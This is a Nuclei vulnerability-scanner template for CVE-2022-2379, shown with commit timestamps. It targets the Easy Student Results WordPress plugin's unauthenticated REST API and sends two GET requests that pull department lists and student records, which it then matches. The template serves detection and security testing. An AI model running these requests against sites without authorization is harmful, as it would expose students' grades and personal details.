nuclei-templates/cves/2022/CVE-2022-2379.yaml

59 lines
1.6 KiB
YAML
Raw Normal View History

2022-11-09 14:18:37 +00:00
id: CVE-2022-2379
info:
2022-11-10 16:25:24 +00:00
name: Easy Student Results <= 2.2.8 - Information Disclosure
2022-11-09 14:18:37 +00:00
author: theamanrawat
severity: high
description: |
The Easy Student Results WordPress plugin through 2.2.8 lacks authorisation in its REST API, allowing unauthenticated users to retrieve information related to the courses, exams, departments as well as student's grades and PII such as email address, physical address, phone number etc.
reference:
- https://wpscan.com/vulnerability/0773ba24-212e-41d5-9ae0-1416ea2c9db6
- https://wordpress.org/plugins/easy-student-results/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2379
2022-11-10 16:25:24 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-11-10 16:25:24 +00:00
cve-id: CVE-2022-2379
cwe-id: CWE-862
2022-11-10 16:25:24 +00:00
metadata:
verified: "true"
tags: wordpress,wp-plugin,wp,easy-student-results,disclosure,wpscan,cve,cve2022
2022-11-09 14:18:37 +00:00
requests:
- raw:
- |
GET /wp-json/rps_result/v1/route/student_fields HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-json/rps_result/v1/route/search_student?department_id=1&batch_id=1 HTTP/1.1
Host: {{Hostname}}
2022-11-10 16:25:24 +00:00
stop-at-first-match: true
2022-11-09 14:18:37 +00:00
req-condition: true
2022-11-10 16:25:24 +00:00
matchers-condition: and
2022-11-09 14:18:37 +00:00
matchers:
- type: word
2022-11-10 16:25:24 +00:00
part: body_1
2022-11-09 14:18:37 +00:00
words:
2022-11-10 16:25:24 +00:00
- '"departments":'
2022-11-09 14:18:37 +00:00
- 'batches":'
condition: and
- type: word
part: body_2
words:
- 'meta_data'
2022-11-10 16:25:24 +00:00
- '"name":"'
- '"registration_no":'
2022-11-09 14:18:37 +00:00
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
2022-11-10 16:25:24 +00:00
- 200